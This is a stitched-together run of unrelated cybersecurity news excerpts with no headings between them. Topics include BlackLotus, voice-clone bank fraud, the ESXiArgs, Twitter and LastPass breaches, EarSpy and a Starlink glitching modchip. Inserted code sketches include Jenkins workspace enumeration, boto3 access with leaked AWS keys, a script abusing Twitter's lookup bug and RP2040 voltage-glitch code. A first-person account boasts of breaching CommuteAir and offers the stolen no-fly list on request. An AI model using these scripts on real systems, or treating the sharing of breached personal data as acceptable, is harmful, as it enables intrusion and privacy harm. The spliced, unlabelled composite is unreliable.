Secure Boot is supposed to stop Windows machines from booting unauthorized software. But by targeting UEFI, the BlackLotus malware loads before anything else in the boot process, including the operating system and any security tools that could stop it.
Kaspersky’s lead security researcher Sergey Lozhkin first saw BlackLotus being sold on cybercrime marketplaces back in October 2022, and security specialists have been taking it apart piece by piece ever since.
[…]
BlackLotus exploits a more than one-year-old vulnerability, CVE-2022-21894, to bypass the secure boot process and establish persistence. Microsoft fixed this CVE in January 2022, but miscreants can still exploit it because the affected signed binaries have not been added to the UEFI revocation list, ESET researcher Martin Smolár noted.
“BlackLotus takes advantage of this, bringing its own copies of legitimate – but vulnerable – binaries to the system in order to exploit the vulnerability,” he wrote.
Plus, a proof-of-concept exploit for this vulnerability has been publicly available since August 2022, so expect to see more cybercriminals using this issue for illicit purposes soon.
Making it even more difficult to detect: BlackLotus can disable several OS security tools including BitLocker, Hypervisor-protected Code Integrity (HVCI) and Windows Defender, and bypass User Account Control (UAC), according to the security shop.
[…]
Once BlackLotus exploits CVE-2022-21894 and turns off the system’s security tools, it deploys a kernel driver and an HTTP downloader. The kernel driver, among other things, protects the bootkit files from removal, while the HTTP downloader communicates with the command-and-control server and executes payloads.
The bootkit research follows UEFI vulnerabilities in Lenovo laptops that ESET discovered last spring, which, among other things, allow attackers to disable secure boot.
On Wednesday, I phoned my bank’s automated service line. To start, the bank asked me to say in my own words why I was calling. Rather than speak out loud, I clicked a file on my nearby laptop to play a sound clip: “check my balance,” my voice said. But this wasn’t actually my voice. It was a synthetic clone I had made using readily available artificial intelligence technology.
“Okay,” the bank replied. It then asked me to enter or say my date of birth as the first piece of authentication. After typing that in, the bank said “please say, ‘my voice is my password.’”
Again, I played a sound file from my computer. “My voice is my password,” the voice said. The bank’s security system spent a few seconds authenticating the voice.
“Thank you,” the bank said. I was in.
I couldn’t believe it—it had worked. I had used an AI-powered replica of a voice to break into a bank account. After that, I had access to the account information, including balances and a list of recent transactions and transfers.
Banks across the U.S. and Europe use this sort of voice verification to let customers log into their account over the phone. Some banks tout voice identification as equivalent to a fingerprint, a secure and convenient way for users to interact with their bank. But this experiment shatters the idea that voice-based biometric security provides foolproof protection in a world where anyone can now generate synthetic voices for cheap or sometimes at no cost. I used a free voice creation service from ElevenLabs, an AI-voice company.
Now, abuse of AI-voices can extend to fraud and hacking. Some experts I spoke to after doing this experiment are now calling for banks to ditch voice authentication altogether, although real-world abuse at this time could be rare.
Microsoft Edge has been spotted inserting a banner into the Chrome download page on Google.com begging people to stick with the Windows giant’s browser.
As noted this week by Neowin, an attempt to download and install Chrome Canary using Edge Canary – both experimental browser builds – led to the presentation in the Edge browser window of a banner graphic celebrating the merits of Edge.
Screenshot of Edge injecting an anti-Chrome banner ad into Google.com’s Chrome download page … Source: Chris Frantz
“Microsoft Edge runs on the same technology as Chrome, with the added trust of Microsoft,” the banner proclaims atop a button labeled “Browse securely now.”
This was on a Google web page, google.com/chrome/canary/thank-you.html, and it’s not clear how this ad surfaced. Edge appears to display the banner by itself when the user surfs to the Chrome download page on Google.com, which is just a little bit aggressive.
Microsoft did not immediately respond to a request to explain the promotion and the mechanics behind it.
The ad does not appear to have been delivered through normal ad servers, based on its page placement. There’s debate among those discussing the banner online about whether the ad consists of code injected by Edge into Google’s webpage, which would make it detectable and removable as part of the Document Object Model.
It has also been suggested that the ad may come from Edge as an interface element that’s stacked atop the rendered web page. We believe this is the case.
An individual familiar with browser development confirmed to The Register that he could reproduce the ad, which was said to be written in HTML but wasn’t placed “in” the page. He described the ad as its own browser window that, surprisingly, was viewable with Edge’s “Inspect” option for viewing source code.
Our source speculated the ad was implemented in a way that pushes down the “Content area” – the space where loaded web pages get rendered – to make space for a second rendering area that holds the ad.
The main content area and the ad content area do not interact with each other – they exist in separate worlds, so to speak. But the presence of the ad content area can be inferred by checking the main window’s innerHeight and outerHeight parameters.
Given two browser windows, one with the ad and one without, the main window with the ad will have an innerHeight value that’s less than a similarly sized window without the ad. The difference in the two measurements should correspond to the height of the ad content area.
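A rough way to test this from the outside is to drive Edge with Selenium and compare window.innerHeight on a neutral page against the Chrome download page at the same window size; if the banner reserves its own content area, the inner height on the Chrome page should come up short by roughly the banner’s height. This is a sketch under the assumption that the banner also appears in an automated Edge session, which is not guaranteed.

```python
# Sketch: infer a reserved banner area in Edge by comparing window.innerHeight
# across two pages at the same window size. Assumes the promotional banner
# also appears when Edge is driven by Selenium, which may not hold.
from selenium import webdriver

driver = webdriver.Edge()
driver.set_window_size(1280, 900)

def inner_height(url: str) -> int:
    driver.get(url)
    return driver.execute_script("return window.innerHeight")

baseline = inner_height("https://example.com/")
chrome_page = inner_height("https://www.google.com/chrome/")

# A positive difference suggests a second content area stacked above the page.
print("apparent banner height:", baseline - chrome_page, "px")

driver.quit()
```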
Similar behavior can be found when visiting the Chrome Web Store using Microsoft Edge on macOS: the Chrome Web Store page is topped by an Edge banner that states, “Now you can add extensions from the Chrome Web Store to Microsoft Edge,” followed by a boxed button that says, “Allow extensions from other stores.”
The US Cybersecurity and Infrastructure Security Agency (CISA) has released a recovery script to help companies whose servers were scrambled in the recent ESXiArgs ransomware outbreak.
The malware attack hit thousands of servers across the globe, but there’s no need to enrich criminals any more. In addition to the script, CISA and the FBI today published ESXiArgs ransomware virtual machine recovery guidance on how to recover systems as soon as possible.
The software nasty is estimated to be on more than 3,800 servers globally, according to the Feds. However, “the victim count is likely higher due to Internet search engines being a point-in-time scan and devices being taken offline for remediation before a second scan,” Arctic Wolf Labs’ security researchers noted.
Uncle Sam urged all organizations managing VMware ESXi servers to update to the latest version of the software, harden ESXi hypervisors by disabling the Service Location Protocol (SLP) service, and make sure that ESXi isn’t exposed to the public internet.
VMware has its own guidance here for administrators.
Also: the government agencies really don’t encourage paying the ransom, except when they do.
Bad news, good news
Last Friday, France and Italy’s cybersecurity agencies sounded the alarm on the ransomware campaign that exploits CVE-2021-21974 – a 9.1/10 rated bug disclosed and patched two years ago.
The bad news: the ransomware infects ESXi, VMware’s bare metal hypervisor, which is a potential goldmine for attackers. Once they’ve compromised ESXi, they could move onto guest machines that run critical apps and data.
The good news is that it’s not a very sophisticated piece of malware. Sometimes the encryption and data exfiltration doesn’t work, and shortly after government agencies sounded the alarm, security researchers released their own decryption tool. Now CISA’s added its recovery tool to the pool of fixes.
The US agency compiled the tool using publicly available resources, including the decryptor and tutorial by Enes Sonmez and Ahmet Aykac. “This tool works by reconstructing virtual machine metadata from virtual disks that were not encrypted by the malware,” according to CISA.
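The underlying idea is that the ransomware often left the large “-flat.vmdk” data extents untouched while scrambling the small metadata files around them, so a replacement descriptor pointing at the intact flat file can be regenerated. The sketch below shows that general idea in simplified form; CISA’s script and the Sonmez/Aykac tutorial handle many more cases (thin disks, snapshots, re-registering VMs), and the geometry values here are conventional assumptions rather than anything from those tools.

```python
# Simplified sketch of the recovery idea: rebuild a .vmdk descriptor that
# points at the untouched "-flat.vmdk" extent. Real recovery (CISA's script,
# the Sonmez/Aykac tutorial) covers thin disks, snapshots, and VM
# re-registration; geometry values below follow common conventions and are
# assumptions for illustration.
import os
import sys

flat_path = sys.argv[1]                      # e.g. myvm-flat.vmdk
sectors = os.path.getsize(flat_path) // 512  # total 512-byte sectors

descriptor = f"""# Disk DescriptorFile
version=1
CID=fffffffe
parentCID=ffffffff
createType="vmfs"

# Extent description
RW {sectors} VMFS "{os.path.basename(flat_path)}"

# The Disk Data Base
ddb.virtualHWVersion = "14"
ddb.geometry.cylinders = "{sectors // (255 * 63)}"
ddb.geometry.heads = "255"
ddb.geometry.sectors = "63"
ddb.adapterType = "lsilogic"
"""

out_path = flat_path.replace("-flat.vmdk", ".vmdk")
with open(out_path, "w") as fh:
    fh.write(descriptor)
print("wrote", out_path)
```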
Kaspersky discovered two new Prilex variants in early 2022 and found a third in November that can target NFC-enabled credit cards and block contactless transactions, forcing payers over to the less-secure PIN machines.
“The goal here is to force the victim to use their physical card by inserting it into the PIN pad reader, so the malware will be able to capture the data coming from the transaction,” the researchers write in a report published this week.
The malware’s new capabilities build on those that already make Prilex the most advanced POS threat, they add. It has a unique cryptographic scheme and can patch target software in real time, force protocol downgrades, run GHOST transactions, and carry out credit card fraud, including against the most sophisticated chip-and-PIN technologies.
Once the buyer puts the credit card into the PIN machine, all those techniques can go into action.
[…]
The tap-to-pay system activates the card’s RFID chip, which sends a unique ID number and transaction to the terminal, neither of which can be used again. There is nothing for a cybercriminal to steal.
[…]
When Prilex detects and blocks a contactless transaction, the EFT software will have the PIN system show an error message that reads “Contactless error, insert your card.”
It also can filter credit cards by segment and create different rules for each segment.
“For example, these rules can block NFC and capture card data only if the card is a Black/Infinite, Corporate or another tier with a high transaction limit, which is much more attractive than standard credit cards with a low balance/limit,” the researchers wrote.
A Dutch hacker arrested in November obtained and offered for sale the full name, address and date of birth of virtually everyone in Austria, the Alpine nation’s police said on Wednesday.
A user believed to be the hacker offered the data for sale in an online forum in May 2020, presenting it as “the full name, gender, complete address and date of birth of presumably every citizen” in Austria, police said in a statement, adding that investigators had confirmed its authenticity.
The trove comprised close to nine million sets of data, police said. Austria’s population is roughly 9.1 million. The hacker had also put “similar data sets” from Italy, the Netherlands and Colombia up for sale, Austrian police said, adding that they did not have further details.
[…]
The police did not elaborate on the consequences for Austrians’ data security.
Thousands of people who use Norton password manager began receiving emailed notices this month alerting them that an unauthorized party may have gained access to their personal information along with the passwords they have stored in their vaults.
Gen Digital, Norton’s parent company, said the security incident was the result of a credential-stuffing attack rather than an actual breach of the company’s internal systems. Gen’s portfolio of cybersecurity services has a combined user base of 500 million users — of which about 925,000 active and inactive users, including approximately 8,000 password manager users, may have been targeted in the attack, a Gen spokesperson told CNET via email.
[…]
Norton’s intrusion detection systems detected an unusual number of failed login attempts on Dec. 12, the company said in its notice. On further investigation, around Dec. 22, Norton was able to determine that the attack began around Dec. 1.
“Norton promptly notified both regulators and customers as soon as the team was able to confirm that data was accessed in the attack,” Gen’s spokesperson said.
Personal data that may have been compromised includes Norton users’ full names, phone numbers and mailing addresses. Norton also said it “cannot rule out” that password manager vault data including users’ usernames and passwords were compromised in the attack.
“Systems have not been compromised, and they are safe and operational, but as is all too commonplace in today’s world, bad actors may take credentials found elsewhere, like the Dark Web, and create automated attacks to gain access to other unrelated accounts,” the spokesperson said.
note: this is a slightly more technical* and comedic write up of the story covered by my friends over at dailydot, which you can read here
*i say slightly since there isnt a whole lot of complicated technical stuff going on here in the first place
step 1: boredom
like so many of my other hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, chinese shodan), looking for exposed jenkins servers that may contain some interesting goods. at this point i’ve probably clicked through about 20 boring exposed servers with very little of any interest, when i suddenly start seeing some familiar words. “ACARS“, lots of mentions of “crew” and so on. lots of words i’ve heard before, most likely while binge watching Mentour Pilot YouTube videos. jackpot. an exposed jenkins server belonging to CommuteAir.
step 2: how much access do we have really?
ok but let’s not get too excited too quickly. just because we have found a funky jenkins server doesn’t mean we’ll have access to much more than build logs. it quickly turns out that while we don’t have anonymous admin access (yes that’s quite frequently the case [god i love jenkins]), we do have access to build workspaces. this means we get to see the repositories that were built for each one of the ~70 build jobs.
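for the curious: poking at an open jenkins like this mostly just means hitting its json api and the workspace browser with plain http. a rough sketch of the kind of thing i mean (generic jenkins endpoints and a made-up hostname, nothing target-specific):

```python
# rough sketch of enumerating an exposed jenkins instance via its json api
# and peeking at build workspaces. generic jenkins endpoints; the hostname
# is a placeholder.
import requests

BASE = "https://jenkins.example.com"  # hypothetical exposed instance

# list all jobs visible to the anonymous user
jobs = requests.get(f"{BASE}/api/json?tree=jobs[name,url]").json()["jobs"]

for job in jobs:
    print(job["name"])
    # the workspace browser lives under <job>/ws/ when read access is granted
    ws = requests.get(f"{job['url']}ws/")
    if ws.ok and "application-prod.properties" in ws.text:
        print("  -> workspace exposes a prod config file")
```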
step 3: let’s dig in
most of the projects here seem to be fairly small spring boot projects. the standardized project layout and extensive use of the resources directory for configuration files will be very useful in this whole endeavour.
the very first project i decide to look at in more detail is something about “ACARS incoming”, since ive heard the term acars before, and it sounds spicy. a quick look at the resource directory reveals a file called application-prod.properties (same also for -dev and -uat). it couldn’t just be that easy now, could it?
well, it sure is! two minutes after finding said file im staring at filezilla connected to a navtech sftp server filled with incoming and outgoing ACARS messages. this aviation shit really do get serious.
here is a sample of a departure ACARS message:
from here on i started trying to find journalists interested in a probably pretty broad breach of US aviation. which unfortunately got peoples hopes up in thinking i was behind the TSA problems and groundings a day earlier, but unfortunately im not quite that cool. so while i was waiting for someone to respond to my call for journalists i just kept digging, and oh the things i found.
as i kept looking at more and more config files in more and more of the projects, it dawned on me just how heavily i had already owned them within just half an hour or so. hardcoded credentials there would allow me access to navblue apis for refueling, cancelling and updating flights, swapping out crew members and so on (assuming i was willing to ever interact with a SOAP api in my life which i sure as hell am not).
i however kept looking back at the two projects named noflycomparison and noflycomparisonv2, which seemingly take the TSA nofly list and check if any of commuteair’s crew members have ended up there. there are hardcoded credentials and s3 bucket names, however i just cant find the actual list itself anywhere. probably partially because it seemingly always gets deleted immediately after processing it, most likely specifically because of nosy kittens like me.
fast forward a few hours and im now talking to Mikael Thalen, a staff writer at dailydot. i give him a quick rundown of what i have found so far and how in the meantime, just half an hour before we started talking, i have ended up finding AWS credentials. i now seemingly have access to pretty much their entire aws infrastructure via aws-cli. numerous s3 buckets, dozens of dynamodb tables, as well as various servers and much more. commute really loves aws.
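(for reference, “access to pretty much their entire aws infrastructure” looks about as mundane as this: plain boto3/aws-cli calls with the leaked keys. the key ids, region and names below are placeholders, obviously.)

```python
# what "the hardcoded aws keys work" looks like in practice: plain boto3 calls.
# key id, secret, and region below are placeholders.
import boto3

session = boto3.Session(
    aws_access_key_id="AKIA...",       # hardcoded in the repo config
    aws_secret_access_key="...",
    region_name="us-east-1",
)

s3 = session.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    print("s3://" + bucket["Name"])

dynamodb = session.client("dynamodb")
print(dynamodb.list_tables()["TableNames"])
```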
i also share with him how close we seemingly are to actually finding the TSA nofly list, which would obviously immediately make this an even bigger story than if it were “only” a super trivially ownable airline. i had even peeked at the nofly s3 bucket at this point which was seemingly empty. so we took one last look at the noflycomparison repositories to see if there is anything in there, and for the first time actually take a peek at the test data in the repository. and there it is. three csv files, employee_information.csv, NOFLY.CSV and SELECTEE.CSV. all commited to the repository in july 2022. the nofly csv is almost 80mb in size and contains over 1.56 million rows of data. this HAS to be the real deal (we later get confirmation that it is indeed a copy of the nofly list from 2019).
holy shit, we actually have the nofly list. holy fucking bingle. what?! :3
with the jackpot found and being looked into by my journalism friends i decided to dig a little further into aws. grabbing sample documents from various s3 buckets, going through flight plans and dumping some dynamodb tables. at this point i had found pretty much all PII imaginable for each of their crew members. full names, addresses, phone numbers, passport numbers, pilot’s license numbers, when their next linecheck is due and much more. i had trip sheets for every flight, the potential to access every flight plan ever, a whole bunch of image attachments to bookings for reimbursement flights containing yet again more PII, airplane maintenance data, you name it.
i had owned them completely in less than a day, with pretty much no skill required besides the patience to sift through hundreds of shodan/zoomeye results.
so what happens next with the nofly data
while the nature of this information is sensitive, i believe it is in the public interest for this list to be made available to journalists and human rights organizations. if you are a journalist, researcher, or other party with legitimate interest, please reach out at nofly@crimew.gay. i will only give this data to parties that i believe will do the right thing with it.
note: if you email me there and i do not reply within a regular timeframe it is very likely my reply ended up in your spam folder or got lost. using email not hosted by google or msft is hell. feel free to dm me on twitter in that case.
support me
if you liked this or any of my other security research feel free to support me on my ko-fi. i am unemployed and in a rather precarious financial situation and do this research for free and for the fun of it, so anything goes a long way.
The short version of the latest drama is this: data stolen from Twitter more than a year ago found its way onto a major dark web marketplace this week. The asking price? The crypto equivalent of $2. In other words, it’s basically being given away for free. The hacker who posted the data haul, a user who goes by the moniker “StayMad,” shared the data on the market “Breached,” where anyone can now purchase and peruse it. The cache is estimated to cover at least 235 million people’s information.
[…]
According to multiple reports, the breach material includes the email addresses and/or phone numbers of some 235 million people, the credentials that users used to set up their accounts. This information has been paired with details publicly scraped from users’ profiles, thus allowing the cybercriminals to create more complete data dossiers on potential victims. Bleeping Computer reports that the information for each user includes not only email addresses and phone numbers but also names, screen names/user handles, follower count, and account creation date.
[…]
The data that appeared on “Breached” this week was actually stolen during 2021. Per the Washington Post, cybercriminals exploited an API vulnerability in Twitter’s platform to call up user information connected to hundreds of millions of user accounts. This bug created a bizarre “lookup” function, allowing any person to plug in a phone number or email to Twitter’s systems, which would then verify whether the credential was connected to an active account. The bug would also reveal which specific account was tied to the credential in question.
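To get a sense of how a bug like that turns into a 235-million-row dataset, the abuse pattern looks roughly like the sketch below. The endpoint, parameter, and response fields are placeholders for illustration only, not Twitter’s actual API.

```python
# conceptual sketch of abusing an account-lookup bug at scale.
# the URL and response shape are hypothetical placeholders.
import requests

LOOKUP_URL = "https://api.example.com/lookup"  # stand-in for the vulnerable endpoint

def probe(credential: str):
    """Return the handle tied to an email/phone, or None if no account exists."""
    resp = requests.get(LOOKUP_URL, params={"contact": credential}, timeout=10)
    data = resp.json()
    return data.get("screen_name") if data.get("exists") else None

# feeding in a leaked list of emails and phone numbers yields a mapping of
# credential -> account, the raw material for the "data dossiers" described above
for cred in ["alice@example.com", "+15551230000"]:
    handle = probe(cred)
    if handle:
        print(cred, "->", handle)
```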
The vulnerability was originally reported through Twitter’s bug bounty program in January 2022 and was first publicly acknowledged by the company last August.
Last week, just before Christmas, LastPass dropped a bombshell announcement: as the result of a breach in August, which led to another breach in November, hackers had gotten their hands on users’ password vaults. While the company insists that your login information is still secure, some cybersecurity experts are heavily criticizing its post, saying that it could make people feel more secure than they actually are and pointing out that this is just the latest in a series of incidents that make it hard to trust the password manager.
LastPass’ December 22nd statement was “full of omissions, half-truths and outright lies,” reads a blog post from Wladimir Palant, a security researcher known for helping originally develop Adblock Plus, among other things. Some of his criticisms deal with how the company has framed the incident and how transparent it’s being; he accuses the company of trying to portray the August incident, in which LastPass says “some source code and technical information were stolen,” as a separate breach, when in reality, he says, the company “failed to contain” the original breach.
He also highlights LastPass’ admission that the leaked data included “the IP addresses from which customers were accessing the LastPass service,” saying that could let the threat actor “create a complete movement profile” of customers if LastPass logged every IP address they used with its service.
Another security researcher, Jeremi Gosney, wrote a long post on Mastodon explaining his recommendation to move to another password manager. “LastPass’s claim of ‘zero knowledge’ is a bald-faced lie,” he says, alleging that the company has “about as much knowledge as a password manager can possibly get away with.”
LastPass claims its “zero knowledge” architecture keeps users safe because the company never has access to your master password, which is the thing that hackers would need to unlock the stolen vaults. While Gosney doesn’t dispute that particular point, he does say that the phrase is misleading. “I think most people envision their vault as a sort of encrypted database where the entire file is protected, but no — with LastPass, your vault is a plaintext file and only a few select fields are encrypted.”
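To make the “derive a key from the master password, encrypt only selected fields” model concrete, here is a minimal sketch of that general pattern. It is not LastPass’ actual vault format, and the salt and iteration count are illustrative assumptions.

```python
# generic PBKDF2 + AES-256-CBC field decryption, as a model of the scheme
# described above -- not LastPass' real format or parameters.
import hashlib
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def derive_key(master_password: bytes, salt: bytes, iterations: int = 100_000) -> bytes:
    # PBKDF2-SHA256 stretches the master password into a 256-bit AES key
    return hashlib.pbkdf2_hmac("sha256", master_password, salt, iterations, dklen=32)

def decrypt_field(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    # decrypt a single encrypted vault field (website username, password, note...)
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    return padded[:-padded[-1]]  # strip PKCS#7 padding

# an attacker holding a stolen vault already has every iv and ciphertext;
# the only missing input is master_password, which is why its strength
# (and the iteration count) is the entire remaining defense.
```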
Palant also notes that the encryption only does you any good if the hackers can’t crack your master password, which is LastPass’ main defense in its post: if you use its defaults for password length and strengthening and haven’t reused it on another site, “it would take millions of years to guess your master password using generally-available password-cracking technology,” wrote Karim Toubba, the company’s CEO.
“This prepares the ground for blaming the customers,” writes Palant, saying that “LastPass should be aware that passwords will be decrypted for at least some of their customers. And they have a convenient explanation already: these customers clearly didn’t follow their best practices.” However, he also points out that LastPass hasn’t necessarily enforced those standards. Despite the fact that it made 12-character passwords the default in 2018, Palant says, “I can log in with my eight-character password without any warnings or prompts to change it.”
LastPass’ post has even elicited a response from a competitor, 1Password — on Wednesday, the company’s principal security architect Jeffrey Goldberg wrote a post for its site titled “Not in a million years: It can take far less to crack a LastPass password.” In it, Goldberg calls LastPass’ claim of it taking a million years to crack a master password “highly misleading,” saying that the statistic appears to assume a 12-character, randomly generated password. “Passwords created by humans come nowhere near meeting that requirement,” he writes, saying that threat actors would be able to prioritize certain guesses based on how people construct passwords they can actually remember.
Of course, a competitor’s word should probably be taken with a grain of salt, though Palant echoes a similar idea in his post — he claims the viral XKCD method of creating passwords would take around 3 years to guess with a single GPU, while some 11-character passwords (that many people may consider to be good) would only take around 25 minutes to crack with the same hardware. It goes without saying that a motivated actor trying to break into a specific target’s vault could probably throw more than one GPU at the problem, potentially cutting that time down by orders of magnitude.
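The arithmetic behind all of these estimates is the same: divide the effective search space by the attacker’s guess rate. The rate below is an assumed figure for a single GPU grinding through a PBKDF2-hardened hash, and the search-space numbers are illustrative rather than Palant’s exact calculations.

```python
# back-of-the-envelope crack-time estimates. the guess rate is an assumption
# for one modern GPU attacking a slow, iterated KDF such as PBKDF2.
GUESSES_PER_SECOND = 100_000

def years_to_exhaust(keyspace: float, rate: float = GUESSES_PER_SECOND) -> float:
    return keyspace / rate / (60 * 60 * 24 * 365)

# truly random 12-character password over ~95 printable characters
print(years_to_exhaust(95 ** 12))        # astronomically long

# four random common words ("xkcd style") drawn from a 2,000-word list
print(years_to_exhaust(2_000 ** 4))      # on the order of years

# human-chosen 11-character password reachable via wordlists + mangling rules,
# assuming an effective search space of ~10^8 candidates
print(years_to_exhaust(1e8) * 365 * 24 * 60)  # minutes, not years
```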
Both Gosney and Palant take issue with LastPass’ actual cryptography too, though for different reasons. Gosney accuses the company of basically committing “every ‘crypto 101’ sin” with how its encryption is implemented and how it manages data once it’s been loaded into your device’s memory.
Meanwhile, Palant criticizes the company’s post for painting its password-strengthening algorithm, known as PBKDF2, as “stronger-than-typical.” The idea behind the standard is that it makes it harder to brute-force guess your passwords, as you’d have to perform a certain number of calculations on each guess. “I seriously wonder what LastPass considers typical,” writes Palant, “given that 100,000 PBKDF2 iterations are the lowest number I’ve seen in any current password manager.”
As smartphone manufacturers improve the ear speakers in their devices, it may become easier for malicious actors to leverage a particular side channel to eavesdrop on a targeted user’s conversations, according to a team of researchers from several universities in the United States.
The attack method, named EarSpy, is described in a paper published just before Christmas by researchers from Texas A&M University, Temple University, New Jersey Institute of Technology, Rutgers University, and the University of Dayton.
EarSpy relies on the phone’s ear speaker — the speaker at the top of the device that is used when the phone is held to the ear — and the device’s built-in accelerometer for capturing the tiny vibrations generated by the speaker.
[…]
Android security has improved significantly, and it has become increasingly difficult for malware to obtain the permissions required for direct eavesdropping, such as microphone access.
On the other hand, accessing raw data from the motion sensors in a smartphone does not require any special permissions. Android developers have started placing some restrictions on sensor data collection, but the EarSpy attack is still possible, the researchers said.
A piece of malware planted on a device could use the EarSpy attack to capture potentially sensitive information and send it back to the attacker.
[…]
The researchers discovered that attacks such as EarSpy are becoming increasingly feasible due to the improvements smartphone manufacturers are making to ear speakers. They conducted tests on two Android phones, the OnePlus 7T and the OnePlus 9, and found that the accelerometer picks up significantly more data from the ear speaker in these newer models, which use stereo speakers, than in older OnePlus phones that lacked them.
The experiments conducted by the academic researchers analyzed the reverberation effect of ear speakers on the accelerometer by extracting time-frequency domain features and spectrograms. The analysis focused on gender recognition, speaker recognition, and speech recognition.
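As an illustration of that analysis step (not the paper’s exact pipeline; the sampling rate and input file are assumptions), a log-power spectrogram can be pulled out of raw accelerometer samples like this:

```python
# turning a raw accelerometer trace into a spectrogram feature map.
# FS and the input file are illustrative assumptions, not the paper's setup.
import numpy as np
from scipy.signal import spectrogram

FS = 500  # assumed accelerometer sampling rate in Hz

accel_z = np.load("accel_z.npy")  # placeholder: z-axis samples captured during a call

freqs, times, sxx = spectrogram(accel_z, fs=FS, nperseg=256, noverlap=128)
log_sxx = 10 * np.log10(sxx + 1e-12)  # log-power spectrogram

# log_sxx is a 2-D (frequency x time) array that gender/speaker/speech
# classifiers can be trained on
print(log_sxx.shape)
```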
In the gender recognition test, whose goal is to determine whether the target is male or female, the EarSpy attack had a 98% accuracy. The accuracy was nearly as high, at 92%, for detecting the speaker’s identity.
When it comes to actual speech, the accuracy was up to 56% for capturing digits spoken in a phone call.
In a reminder of smart home security’s dark side, two people hacked Ring security cameras to livestream swattings, according to a Los Angeles grand jury indictment reported by Bloomberg. The pair called in hoax emergencies to authorities and livestreamed the police response on social media in late 2020.
James Thomas Andrew McCarty, 20, of Charlotte, North Carolina, and Kya Christian Nelson, 21, of Racine, Wisconsin, hacked into Yahoo email accounts to gain access to 12 Ring cameras across nine states in November 2020 (disclaimer: Yahoo is Engadget’s parent company). In one of the incidents, Nelson claimed to be a minor reporting their parents for firing guns while drinking alcohol. When police arrived, the pair used the Ring cameras to taunt the victims and officers while livestreaming — a pattern appearing in several incidents, according to prosecutors.
[…]
Although the smart devices can deter things like robberies and “porch pirates,” Amazon admits to providing footage to police without user consent or a court order when it believes someone is in danger. Inexplicably, the tech giant made a zany reality series using Ring footage, which didn’t exactly quell concerns about the tech’s Orwellian side.
Password locker LastPass has warned customers that the August 2022 attack on its systems saw unknown parties copy encrypted files that contain the passwords to their accounts.
In a December 22nd update to its advice about the incident, LastPass brings customers up to date by explaining that in the August 2022 attack, “some source code and technical information were stolen from our development environment and used to target another employee, obtaining credentials and keys which were used to access and decrypt some storage volumes within the cloud-based storage service.”
Those creds allowed the attacker to copy information “that contained basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass service.”
The update reveals that the attacker also copied “customer vault” data – the file LastPass uses to let customers record their passwords.
That file “is stored in a proprietary binary format that contains both unencrypted data, such as website URLs, as well as fully-encrypted sensitive fields such as website usernames and passwords, secure notes, and form-filled data.”
Which means the attackers have users’ passwords. But thankfully those passwords are encrypted with “256-bit AES encryption and can only be decrypted with a unique encryption key derived from each user’s master password”.
LastPass’ advice is that even though attackers have that file, customers who use its default settings have nothing to do as a result of this update as “it would take millions of years to guess your master password using generally-available password-cracking technology.”
One of those default settings is not to re-use the master password that is required to log into LastPass. The outfit suggests you make it a complex credential and use that password for just one thing: accessing LastPass.
LastPass therefore offered the following advice to individual and business users:
If your master password does not make use of the defaults above, then it would significantly reduce the number of attempts needed to guess it correctly. In this case, as an extra security measure, you should consider minimizing risk by changing passwords of websites you have stored.
Enjoy changing all those passwords, dear reader.
LastPass’s update concludes with news it decommissioned the systems breached in August 2022 and has built new infrastructure that adds extra protections.
[Lennert Wouters]’ team has been poking and prodding at the Starlink User Terminal, trying to get root access, and needed to bypass the ARM Trusted Firmware boot-time integrity checks. The terminal’s PCB is satellite-dish-sized, so things like laser fault injection are hard to set up – hence, they went the voltage injection route. Much poking and prodding later, they developed a way to reliably glitch the CPU into verifying a faulty firmware, and got to a root shell – the journey described in a BlackHat talk embedded below.
To make the hack more compact, repeatable and cheap, they decided to move it from a mess of wires and boards into a slim form factor, and that’s where the modchip design came in. For that, they put the terminal PCB into a scanner, traced out a board outline, loaded it into KiCad, and put all the necessary voltage glitching and monitoring parts on a single board, driven by the venerable RP2040 – this board has everything you’d need if you wanted to get root on the Starlink User Terminal. Thanks to the modchip design’s flexibility, when Starlink released a firmware update disabling the UART output used for monitoring, they could easily re-route the signal to an eMMC data line instead. Currently, the KiCad source files aren’t available, but there are Gerber and BOM files on GitHub in case we want to make our own!
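For a sense of why the RP2040 is such a nice fit for this job, here’s a rough MicroPython/PIO sketch of the general crowbar-glitching idea – to be clear, the pin assignments, timings and trigger logic are made up for illustration, and this is not the actual modchip firmware.

```python
# illustrative RP2040 voltage-glitch trigger: wait for a trigger edge, burn a
# programmable delay, then pulse a MOSFET that briefly drags down a supply rail.
# pins, delay and pulse width are placeholders.
import rp2
from machine import Pin

@rp2.asm_pio(set_init=rp2.PIO.OUT_LOW)
def glitcher():
    pull()                      # read the delay (in PIO cycles) from the TX FIFO
    mov(x, osr)
    wait(1, pin, 0)             # wait for the trigger input to go high
    label("delay")
    jmp(x_dec, "delay")         # burn x cycles after the trigger
    set(pins, 1) [31]           # drive the crowbar MOSFET for ~32 cycles
    set(pins, 0)                # release and let the rail recover

# trigger on GPIO2, glitch output on GPIO3; runs at the system clock (125 MHz)
sm = rp2.StateMachine(0, glitcher, in_base=Pin(2), set_base=Pin(3))
sm.active(1)
sm.put(5_000)                   # ~40 microseconds between trigger edge and glitch
```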
Hacks like these undoubtedly set a new bar for what we can achieve while bypassing security protections. Hackers have been designing all kinds of modchips, for both proprietary and open tech – we’ve seen one that lets you use third-party filters in your “smart” air purifier, another that lets you use your own filament with certain 3D printers, and one that lets you add a ton of games to an ArduBoy. With the RP2040 in particular, just this year we’ve seen it used to build a Nintendo 64 flash cart, a PlayStation 1 memory card, and a mod that adds homebrew support to a GameCube. If you were looking to build hardware add-ons that improve upon tech you use, whether by removing protections or adding features, there’s no better time than now!